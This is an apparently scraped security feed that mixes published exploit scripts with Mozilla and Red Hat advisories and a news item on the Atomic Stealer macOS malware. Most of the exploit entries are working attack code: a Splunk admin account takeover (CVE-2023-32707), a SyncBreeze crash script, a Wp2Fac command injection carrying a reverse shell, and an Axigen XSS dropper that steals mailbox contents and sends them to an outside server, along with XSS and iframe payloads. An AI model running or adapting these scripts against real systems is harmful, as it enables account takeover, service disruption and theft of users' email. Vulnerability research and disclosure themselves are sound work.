Splunk Enterprise versions below 9.0.5, 8.2.11, and 8.1.14 allows low-privileged users who hold a role with edit_user capability assigned to it the ability to escalate their privileges to that of the admin user by providing specially crafted web requests.

    https://github.com/redwaysecurity/CVEs/blob/main/CVE-2023-32707/README.md#!/usr/bin/env python3## Splunk admin account take over exploit - CVE-2023-32707# Author: [Redway Security](https://twitter.com/redwaysec))# Discovery: [Santiago Lopez](https://twitter.com/santi_lopezz99)## Vendor Description: A low-privilege user who holds a role that has the `edit_user` capability assigned# to it can escalate their privileges to that of the admin user by providing specially crafted web requests.## Versions Affected: Splunk Enterprise **below** 9.0.5, 8.2.11, and 8.1.14.#import argparseimport requestsimport randomimport stringimport base64# ignore warningsimport urllib3urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)# Parse command-line argumentsparser = argparse.ArgumentParser(description='Splunk Authentication')parser.add_argument('--host', required=True, help='Splunk host or IP address')parser.add_argument('--username', required=True, help='Splunk username')parser.add_argument('--password', required=True, help='Splunk password')parser.add_argument('--target-user', required=True, help='Target user')parser.add_argument('--force-exploit', action='store_true',help='Force exploit')args = parser.parse_args()# Splunk server settingssplunk_host = args.host.split(':')[0]splunk_username = args.usernamesplunk_password = args.passwordtarget_user = args.target_userforce_exploit = args.force_exploitsplunk_port = args.host.split(':')[1] if len(args.host.split(':')) > 1 else 8089user_endpoint = f"https://{splunk_host}:{splunk_port}/services/authentication/users"credentials = f"{splunk_username}:{splunk_password}"base64_credentials = base64.b64encode(credentials.encode()).decode()headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0','Authorization': f'Basic {base64_credentials}'}proxies = {# 'http': '[http://127.0.0.1:8080'](<a href=),">http://127.0.0.1:8080',# 'https': 'http://127.0.0.1:8080'}response = requests.get(f"{user_endpoint}/{splunk_username}?output_mode=json",headers=headers, proxies=proxies, verify=False)if response.status_code == 200:affected_versions = ['9.0.4', '8.2.10', '8.1.13']user = response.json()splunk_version = user['generator']['version']# This is not a good way to compare versions.# There is a range of versions that are affected by this CVE, but this is just a PoC# 8.1.0 to 8.1.13# 8.2.0 to 8.2.10# 9.0.0 to 9.0.4print(f"Detected Splunk version '{splunk_version}'")if any(splunk_version <= value for value in affected_versions) or force_exploit:user_capabilities = user['entry'][0]['content']['capabilities']if 'edit_user' in user_capabilities:print(f"User '{splunk_username}' has the 'edit_user' capability, which would make this target exploitable.")new_password = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(8))change_password_payload = {'password': new_password,'force-change-pass': 0,'locked-out': 0}response = requests.post(f"{user_endpoint}/{target_user}?output_mode=json",data=change_password_payload, headers=headers, proxies=proxies, verify=False)if response.status_code == 200:print(f"Successfully taken over user '{target_user}', log into Splunk with the password '{new_password}'")else:print('Account takeover failed')else:print(f"User '{splunk_username}' does not have the 'edit_user' capability, which makes this target not exploitable by this user.")else:print(f"Splunk version '{splunk_version}' is not affected by CVE-2023-32707")else:print(f"Couldn't authenticate to Splunk server '{splunk_host}' with user '{splunk_username}' and password '{splunk_password}'")exit(1)

Splunk Enterprise Account Takeover

A buffer overflow vulnerability in OpenPLC Runtime's webserver version 3 allows attackers to inject malicious code, leading to an internal server error that is irrecoverable. This also disables the ability to add any new slave devices through the "Add Slave Devices" component on the Modbus page of the application.

OpenPLC Webserver 3 Denial Of Service / Buffer Overflow

IWT Imagine CMS version 1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : IWT Imagineِ CMS v1.0 XSS Vulnerability                                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : http://imaginewebtech.com                                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /photo-gallery.html?id=1'<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] https://127.0.0.1wwsanklechain/photo-gallery.html?id=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

IWT Imagine CMS 1.0 Cross Site Scripting

When receiving rendering data over IPC `mStream` could have been destroyed when initialized, which could have led to a use-after-free causing a potentially exploitable crash. This vulnerability affects Firefox < 117, Firefox ESR < 102.15, Firefox ESR < 115.2, and Thunderbird < 115.2.

**Mozilla Foundation Security Advisory 2023-34**

Announced

August 29, 2023

Impact

high

Products

Firefox

Fixed in

*   Firefox 117

**#CVE-2023-4573: Memory corruption in IPC CanvasTranslator**

Reporter

sonakkbi

Impact

high

**Description**

When receiving rendering data over IPC mStream could have been destroyed when initialized, which could have led to a use-after-free causing a potentially exploitable crash.

**References**

*   Bug 1846687

**#CVE-2023-4574: Memory corruption in IPC ColorPickerShownCallback**

Reporter

sonakkbi

Impact

high

**Description**

When creating a callback over IPC for showing the Color Picker window, multiple of the same callbacks could have been created at a time and eventually all simultaneously destroyed as soon as one of the callbacks finished. This could have led to a use-after-free causing a potentially exploitable crash.

**References**

*   Bug 1846688

**#CVE-2023-4575: Memory corruption in IPC FilePickerShownCallback**

Reporter

sonakkbi

Impact

high

**Description**

When creating a callback over IPC for showing the File Picker window, multiple of the same callbacks could have been created at a time and eventually all simultaneously destroyed as soon as one of the callbacks finished. This could have led to a use-after-free causing a potentially exploitable crash.

**References**

*   Bug 1846689

**#CVE-2023-4576: Integer Overflow in RecordedSourceSurfaceCreation**

Reporter

fffvr

Impact

high

**Description**

On Windows, an integer overflow could occur in RecordedSourceSurfaceCreation which resulted in a heap buffer overflow potentially leaking sensitive data that could have led to a sandbox escape.  
_This bug only affects Firefox on Windows. Other operating systems are unaffected._

**References**

*   Bug 1846694

**#CVE-2023-4577: Memory corruption in JIT UpdateRegExpStatics**

Reporter

Lukas Bernhard

Impact

high

**Description**

When UpdateRegExpStatics attempted to access initialStringHeap it could already have been garbage collected prior to entering the function, which could potentially have led to an exploitable crash.

**References**

*   Bug 1847397

**#CVE-2023-4578: Error reporting methods in SpiderMonkey could have triggered an Out of Memory Exception**

Reporter

Irvan Kurniawan (@sourc7)

Impact

moderate

**Description**

When calling JS::CheckRegExpSyntax a Syntax Error could have been set which would end in calling convertToRuntimeErrorAndClear. A path in the function could attempt to allocate memory when none is available which would have caused a newly created Out of Memory exception to be mishandled as a Syntax Error.

**References**

*   Bug 1839007

**#CVE-2023-4579: Persisted search terms were formatted as URLs**

Reporter

Malte Jürgens

Impact

moderate

**Description**

Search queries in the default search engine could appear to have been the currently navigated URL if the search query itself was a well formed URL. This could have led to a site spoofing another if it had been maliciously set as the default search engine.

**References**

*   Bug 1842766

**#CVE-2023-4580: Push notifications saved to disk unencrypted**

Reporter

Harveer Singh

Impact

moderate

**Description**

Push notifications stored on disk in private browsing mode were not being encrypted potentially allowing the leak of sensitive information.

**References**

*   Bug 1843046

**#CVE-2023-4581: XLL file extensions were downloadable without warnings**

Reporter

Umar Farooq (@Puf)

Impact

moderate

**Description**

Excel .xll add-in files did not have a blocklist entry in Firefox's executable blocklist which allowed them to be downloaded without any warning of their potential harm.

**References**

*   Bug 1843758

**#CVE-2023-4582: Buffer Overflow in WebGL glGetProgramiv**

Reporter

Dohyun Lee (@l33d0hyun) of SSD-Disclosure Labs & DNSLab, Korea Univ.

Impact

low

**Description**

Due to large allocation checks in Angle for glsl shaders being too lenient a buffer overflow could have occured when allocating too much private shader memory on mac OS.  
_This bug only affects Firefox on macOS. Other operating systems are unaffected._

**References**

*   Bug 1773874

**#CVE-2023-4583: Browsing Context potentially not cleared when closing Private Window**

Reporter

Thejaka Maldeniya

Impact

low

**Description**

When checking if the Browsing Context had been discarded in HttpBaseChannel, if the load group was not available then it was assumed to have already been discarded which was not always the case for private channels after the private session had ended.

**References**

*   Bug 1842030

**#CVE-2023-4584: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15, Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2**

Reporter

Randell Jesup, Andrew McCreight, the Mozilla Fuzzing Team

Impact

high

**Description**

Memory safety bugs present in Firefox 116, Firefox ESR 102.14, Firefox ESR 115.1, Thunderbird 102.14, and Thunderbird 115.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15, Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2

**#CVE-2023-4585: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and Thunderbird 115.2**

Reporter

Donal Meehan, Sebastian Hengst, and the Mozilla Fuzzing Team

Impact

high

**Description**

Memory safety bugs present in Firefox 116, Firefox ESR 115.1, and Thunderbird 115.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and Thunderbird 115.2

CVE-2023-4573: Security Vulnerabilities fixed in Firefox 117

SyncBreeze version 15.2.24 suffers from a denial of service vulnerability.

    # Exploit Title: SyncBreeze 15.2.24 -'login' Denial of Service# Date: 30/08/2023# Exploit Author: mohamed youssef# Vendor Homepage: https://www.syncbreeze.com/# Software Link: https://www.syncbreeze.com/setups/syncbreeze_setup_v15.4.32.exe# Version: 15.2.24# Tested on: windows 10 64-bitimport socketimport timepyload="username=admin&password="+'password='*500+""request=""request+="POST /login HTTP/1.1\r\n"request+="Host: 192.168.217.135\r\n"request+="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\r\n"request+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\n"request+="Accept-Language: en-US,en;q=0.5\r\n"request+="Accept-Encoding: gzip, deflate\r\n"request+="Content-Type: application/x-www-form-urlencoded\r\n"request+="Content-Length: "+str(len(pyload))+"\r\n"request+="Origin: http://192.168.217.135\r\n"request+="Connection: keep-alive\r\n"request+="Referer: http://192.168.217.135/login\r\n"request+="Upgrade-Insecure-Requests: 1\r\n"request+="\r\n"request+=pyloadprint (request)s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("192.168.217.135",80))s.send(request.encode())print (s.recv(1024))s.close()time.sleep(5)

SyncBreeze 15.2.24 Denial Of Service

Wp2Fac version 1.0 suffers from an OS command injection vulnerability.

    # Exploit Title: Wp2Fac v1.0 - OS Command Injection# Date: 2023-08-27# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://github.com/metinyesil/wp2fac# Tested on: Kali Linux & Windows 11# CVE: N/Aimport requestsdef send_post_request(host, revshell):    url = f'http://{host}/send.php'    headers = {        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0)Gecko/20100101 Firefox/102.0',        'Accept': '*/*',        'Accept-Language': 'en-US,en;q=0.5',        'Accept-Encoding': 'gzip, deflate',        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',        'X-Requested-With': 'XMLHttpRequest',        'Origin': f'http://{host}',        'Connection': 'close',        'Referer': f'http://{host}/',    }    data = {        'numara': f'1234567890 & {revshell} &;'    }    response = requests.post(url, headers=headers, data=data)    return response.texthost = input("Target IP: ")revshell = input("Reverse Shell Command: ")print("Check your listener!")send_post_request(host, revshell)

Wp2Fac 1.0 Command Injection

Axigen versions 10.5.0–4370c946 and below suffer from a cross site scripting vulnerability.

    # Exploit Title: Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS# Google Dork: inurl:passwordexpired=yes# Date: 2023-08-21# Exploit Author: AmirZargham# Vendor Homepage: https://www.axigen.com/# Software Link: https://www.axigen.com/mail-server/download/# Version: (10.5.0–4370c946) and older version of Axigen WebMail# Tested on: firefox,chrome# CVE: CVE-2022-31470ExploitWe use the second Reflected XSS to exploit this vulnerability, create amalicious link, and steal user emails.Dropper codeThis dropper code, loads and executes JavaScript exploit code from a remoteserver.');x = document.createElement('script');x.src = 'https://example.com/exploit.js';window.addEventListener('DOMContentLoaded',function y(){  document.body.appendChild(x)})//Encoded form/index.hsp?m=%27)%3Bx%3Ddocument.createElement(%27script%27)%3Bx.src%3D%27https://example.com/exploit.js%27%3Bwindow.addEventListener(%27DOMContentLoaded%27,function+y(){document.body.appendChild(x)})//Exploit codexhr1 = new XMLHttpRequest(), xhr2 = new XMLHttpRequest(), xhr3 = newXMLHttpRequest();oob_server = 'https://example.com/';var script_tag = document.createElement('script');xhr1.open('GET', '/', true);xhr1.onreadystatechange = () => {    if (xhr1.readyState === XMLHttpRequest.DONE) {        _h_cookie = new URL(xhr1.responseURL).search.split("=")[1];        xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`,true);        xhr2.setRequestHeader('Content-Type', 'application/json');        xhr2.onreadystatechange = () => {            if (xhr2.readyState === XMLHttpRequest.DONE) {                if (xhr2.status === 401){                    script_tag.src =`${oob_server}?status=session_expired&domain=${document.domain}`;                    document.body.appendChild(script_tag);                } else {                    resp = xhr2.responseText;                    folderId = JSON.parse(resp)["mails"][0]["folderId"];                    xhr3.open('GET',`/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true);                    xhr3.onreadystatechange = () => {                        if (xhr3.readyState === XMLHttpRequest.DONE) {                            emails = xhr3.responseText;                            script_tag.src =`${oob_server}?status=ok&domain=${document.domain}&emails=${btoa(emails)}`;                            document.body.appendChild(script_tag);                        }                    };                    xhr3.send();                }            }        };        var body = JSON.stringify({isUnread: false});        xhr2.send(body);    }};xhr1.send();Combining dropper and exploitYou can host the exploit code somewhere and then address it in the droppercode.

Axigen 10.5.0–4370c946 Cross Site Scripting

WordPress Elementor plugin versions prior to 3.5.5 suffer from an iframe injection vulnerability.

    # Exploit Title: Wordpress Plugin Elementor < 3.5.5 - Iframe Injection# Date: 28.08.2023# Exploit Author: Miguel Santareno# Vendor Homepage: https://elementor.com/# Version: < 3.5.5# Tested on: Google and Firefox latest version# CVE : CVE-2022-4953# 1. DescriptionThe plugin does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs.# 2. Proof of Concept (PoC)Proof of Concept:https://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K

WordPress Elementor Iframe Injection

A new malvertising campaign has been observed distributing an updated version of a macOS stealer malware called Atomic Stealer (or AMOS), indicating that it’s being actively maintained by its author.
An off-the-shelf Golang malware available for $1,000 per month, Atomic Stealer first came to light in April 2023. Shortly after that, new variants with an expanded set of information-gathering

Malvertising / Endpoint Security

A new malvertising campaign has been observed distributing an updated version of a macOS stealer malware called **Atomic Stealer** (or AMOS), indicating that it's being actively maintained by its author.

An off-the-shelf Golang malware available for $1,000 per month, Atomic Stealer first came to light in April 2023. Shortly after that, new variants with an expanded set of information-gathering features were detected in the wild, targeting gamers and cryptocurrency users.

Malvertising via Google Ads has been observed as the primary distribution vector in which users searching for popular software, legitimate or cracked, on search engines are shown bogus ads that direct to websites hosting rogue installers.

The latest campaign involves the use of a fraudulent website for TradingView, prominently featuring three buttons to download the software for Windows, macOS, and Linux operating systems.

"Both the Windows and Linux buttons point to an MSIX installer hosted on Discord that drops NetSupport RAT," Jérôme Segura, director of threat intelligence at Malwarebytes, said.

The macOS payload ("TradingView.dmg") is a new version of Atomic Stealer released at the end of June, which is bundled in an ad-hoc signed app that, once executed, prompts users to enter their password on a fake prompt and harvest files as well as data stored in iCloud Keychain and web browsers.

"Atomic stealer also targets both Chrome and Firefox browsers and has an extensive hardcoded list of crypto-related browser extensions to attack," SentinelOne previously noted in May 2023. Select variants have also targeted Coinomi wallets.

The ultimate goal of the attacker is to bypass Gatekeeper protections in macOS and exfiltrate the stolen information to a server under their control.

The development comes as macOS is increasingly becoming a viable target of malware attacks, with a number of macOS-specific info stealers appearing for sale in crimeware forums in recent months to take advantage of the wide availability of Apple systems in organizations.

UPCOMING WEBINAR

Way Too Vulnerable: Uncovering the State of the Identity Attack Surface

Achieved MFA? PAM? Service account protection? Find out how well-equipped your organization truly is against identity threats

Supercharge Your Skills

"While Mac malware really does exist, it tends to be less detected than its Windows counterpart," Segura said. "The developer or seller for AMOS actually made it a selling point that their toolkit is capable of evading detection."

Atomic Stealer is not the only malware propagated via malvertising and search engine optimization (SEO) poisoning campaigns, as evidence has emerged of DarkGate (aka MehCrypter) latching onto the same delivery mechanism.

New versions of DarkGate have since been employed in attacks mounted by threat actors employing tactics similar to that of Scattered Spider, Aon's Stroz Friedberg Incident Response Services said last month.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Mac Users Beware: Malvertising Campaign Spreads Atomic Stealer macOS Malware

Red Hat Security Advisory 2023-5019-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.15.0 ESR.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2023:5019-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5019  
Issue date:        2023-09-07  
CVE Names:         CVE-2023-4051 CVE-2023-4053 CVE-2023-4573   
                   CVE-2023-4574 CVE-2023-4575 CVE-2023-4577   
                   CVE-2023-4578 CVE-2023-4580 CVE-2023-4581   
                   CVE-2023-4583 CVE-2023-4584 CVE-2023-4585   
=====================================================================

1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.15.0 ESR.

Security Fix(es):

* Mozilla: Memory corruption in IPC CanvasTranslator (CVE-2023-4573)

* Mozilla: Memory corruption in IPC ColorPickerShownCallback  
(CVE-2023-4574)

* Mozilla: Memory corruption in IPC FilePickerShownCallback (CVE-2023-4575)

* Mozilla: Memory corruption in JIT UpdateRegExpStatics (CVE-2023-4577)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15,  
Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
(CVE-2023-4584)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and  
Thunderbird 115.2 (CVE-2023-4585)

* Mozilla: Full screen notification obscured by file open dialog  
(CVE-2023-4051)

* Mozilla: Full screen notification obscured by external program  
(CVE-2023-4053)

* Mozilla: Error reporting methods in SpiderMonkey could have triggered an  
Out of Memory Exception (CVE-2023-4578)

* Mozilla: Push notifications saved to disk unencrypted (CVE-2023-4580)

* Mozilla: XLL file extensions were downloadable without warnings  
(CVE-2023-4581)

* Mozilla: Browsing Context potentially not cleared when closing Private  
Window (CVE-2023-4583)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2236071 - CVE-2023-4573 Mozilla: Memory corruption in IPC CanvasTranslator  
2236072 - CVE-2023-4574 Mozilla: Memory corruption in IPC ColorPickerShownCallback  
2236073 - CVE-2023-4575 Mozilla: Memory corruption in IPC FilePickerShownCallback  
2236075 - CVE-2023-4577 Mozilla: Memory corruption in JIT UpdateRegExpStatics  
2236076 - CVE-2023-4051 Mozilla: Full screen notification obscured by file open dialog  
2236077 - CVE-2023-4578 Mozilla: Error reporting methods in SpiderMonkey could have triggered an Out of Memory Exception  
2236078 - CVE-2023-4053 Mozilla: Full screen notification obscured by external program  
2236079 - CVE-2023-4580 Mozilla: Push notifications saved to disk unencrypted  
2236080 - CVE-2023-4581 Mozilla: XLL file extensions were downloadable without warnings  
2236082 - CVE-2023-4583 Mozilla: Browsing Context potentially not cleared when closing Private Window  
2236084 - CVE-2023-4584 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15, Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
2236086 - CVE-2023-4585 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and Thunderbird 115.2

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
firefox-102.15.0-1.el7_9.src.rpm

x86_64:  
firefox-102.15.0-1.el7_9.x86_64.rpm  
firefox-debuginfo-102.15.0-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:  
firefox-102.15.0-1.el7_9.i686.rpm  
firefox-debuginfo-102.15.0-1.el7_9.i686.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
firefox-102.15.0-1.el7_9.src.rpm

ppc64:  
firefox-102.15.0-1.el7_9.ppc64.rpm  
firefox-debuginfo-102.15.0-1.el7_9.ppc64.rpm

ppc64le:  
firefox-102.15.0-1.el7_9.ppc64le.rpm  
firefox-debuginfo-102.15.0-1.el7_9.ppc64le.rpm

s390x:  
firefox-102.15.0-1.el7_9.s390x.rpm  
firefox-debuginfo-102.15.0-1.el7_9.s390x.rpm

x86_64:  
firefox-102.15.0-1.el7_9.x86_64.rpm  
firefox-debuginfo-102.15.0-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

x86_64:  
firefox-102.15.0-1.el7_9.i686.rpm  
firefox-debuginfo-102.15.0-1.el7_9.i686.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
firefox-102.15.0-1.el7_9.src.rpm

x86_64:  
firefox-102.15.0-1.el7_9.x86_64.rpm  
firefox-debuginfo-102.15.0-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:  
firefox-102.15.0-1.el7_9.i686.rpm  
firefox-debuginfo-102.15.0-1.el7_9.i686.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-4051  
https://access.redhat.com/security/cve/CVE-2023-4053  
https://access.redhat.com/security/cve/CVE-2023-4573  
https://access.redhat.com/security/cve/CVE-2023-4574  
https://access.redhat.com/security/cve/CVE-2023-4575  
https://access.redhat.com/security/cve/CVE-2023-4577  
https://access.redhat.com/security/cve/CVE-2023-4578  
https://access.redhat.com/security/cve/CVE-2023-4580  
https://access.redhat.com/security/cve/CVE-2023-4581  
https://access.redhat.com/security/cve/CVE-2023-4583  
https://access.redhat.com/security/cve/CVE-2023-4584  
https://access.redhat.com/security/cve/CVE-2023-4585  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk+ctKAAoJENzjgjWX9erE7AAQAIR+dzCTGF9i9nf0ayNsK3Pe  
Rk4TmAqX4wlOo+bjpYxezU5R8eGn7142w+zN3HZCtnGQGGrNJfJZYa58rSgLftaL  
mFT5gSNslOboKez1PU46DwMlN8umldYr+bzPMJsxLb9+H3Fk3U8WJsG/01onr+4M  
/ebTKrTPwUohKYS+qk3fM/4X/TC4Lt0qjHUR2DQuVKMRrWV+nqKirJ1sysTER8qc  
X7cpuxiPuIy1Ja0Pa/zKwCVbJr5p34aAO2zvVq3Ga757SPIJJO/X+N+SRJihRFKV  
Ac5Js5lbVK8/h9d1abUFMG2055CW2eYo0vesbyeYXoCKlT935X5uItb241rwmQFL  
iGStlIUWrX9pncpAX9ne5KJuYXi7zIUsazfVj1A1m94P8YK0aVnLFHbNLJmrNJga  
x33M0UeagROnjK13pmMI52o6aTF5E8MgUQhsLZC3kk9zW5EMSm1xlN+OuKQhTH7f  
IhatDJg6FBDAEPVAYijNeejdy/kPo8FXBPyoFDVyi5wdGyMyATqIoRG+0/8YsMlG  
MnwYs5C4bz34YOKv0V6jHvqChV/2bHNGSiW9vJEAZ6hA58SneJHwSmach5Cp7eON  
IXeIGOmVFwJMTS30jSXdWUGMPyUxqMAKxs4ayPnEURhOCjRhBvMXqtwpEIG/pz+m  
6lKd728IFmTZmFnZ11sb  
=s3dk  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#firefox